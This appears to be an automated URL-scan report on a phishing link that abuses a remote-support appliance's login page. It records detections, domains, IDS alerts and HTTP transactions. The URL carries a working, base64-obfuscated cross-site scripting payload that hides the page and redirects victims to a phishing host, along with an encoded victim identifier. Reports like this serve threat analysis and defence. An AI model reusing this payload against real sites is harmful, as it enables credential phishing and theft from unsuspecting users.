Report Overview

  1. Visited public
    2025-05-30 16:19:01
  2. URL

    remotesupport.level8tech.net/appliance/login?login[password]=test"/><script>var%20addt=%20"?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=";eval(atob('ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg'));</script>>&login[use_curr]=1&login[submit]=Change%20Password

  3. Finishing URL

    google.com/404/

  4. IP / ASN
    50.199.20.75

    #7922 COMCAST-7922

    Title
    Error 404 (Not Found)!!1
  5. Suspicious - Anti-debugging code

    Phishing - Mamba Phishing Kit

Detections
urlquery
10
Network Intrusion Detection
2
Threat Detection Systems
6

Domain Summary

Domain / FQDNRankRegisteredFirst SeenLast Seen
remotesupport.level8tech.netunknown2013-02-212025-05-302025-05-30
accounting-portal.bchsaa.orgunknown2024-03-162025-05-302025-05-30
taxexpertscan.comunknown2024-01-062025-05-232025-05-23
google.com11997-09-152013-10-022025-05-28
www.google.com71997-09-152015-05-102025-05-28

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

SeveritySource IPDestination IPAlert
low 45.61.161.154Client IP
low 45.61.161.154Client IP

Threat Detection Systems

Public InfoSec YARA rules

No alerts detected


OpenPhish
SeverityIndicatorAlert
mediumtaxexpertscan.com/Generic/Spear Phishing
mediumtaxexpertscan.com/Generic/Spear Phishing
mediumtaxexpertscan.com/Generic/Spear Phishing

PhishTank

No alerts detected


Quad9 DNS

No alerts detected


ThreatFox

No alerts detected


JavaScript (8)

HTTP Transactions (19)

URLIPResponseSize
GET remotesupport.level8tech.net/appliance/content/appliance.js
50.199.20.75200 OK750 B
GET remotesupport.level8tech.net/appliance/content/bomgar177.jpg
0.0.0.0 0 B
GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
0.0.0.0 0 B
GET taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245200 OK2.9 kB
GET taxexpertscan.com/files/images/Logo.png
162.241.27.245200 OK1.1 kB
GET google.com/404/
142.250.74.78404 Not Found1.6 kB
GET remotesupport.level8tech.net/appliance/content/style.css
50.199.20.75200 OK8.9 kB
GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
45.61.161.154200 OK2.8 kB
GET accounting-portal.bchsaa.org/favicon.ico
45.61.161.154200 OK0 B
POST accounting-portal.bchsaa.org/araga3ad
45.61.161.154200 OK158 B
GET www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
142.250.178.100200 OK3.2 kB
GET remotesupport.level8tech.net/appliance/content/globe.png
0.0.0.0 0 B
GET taxexpertscan.com/favicon.ico
162.241.27.245200 OK1.1 kB
POST taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245301 Moved Permanently1.6 kB
GET www.google.com/images/errors/robot.png
142.250.178.100200 OK6.3 kB
GET taxexpertscan.com/s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245301 Moved Permanently2.9 kB
GET remotesupport.level8tech.net/appliance/content/noframe.js
50.199.20.75200 OK351 B
GET remotesupport.level8tech.net/appliance/content/prototype.js
50.199.20.75200 OK163 kB
GET remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
50.199.20.75200 OK3.5 kB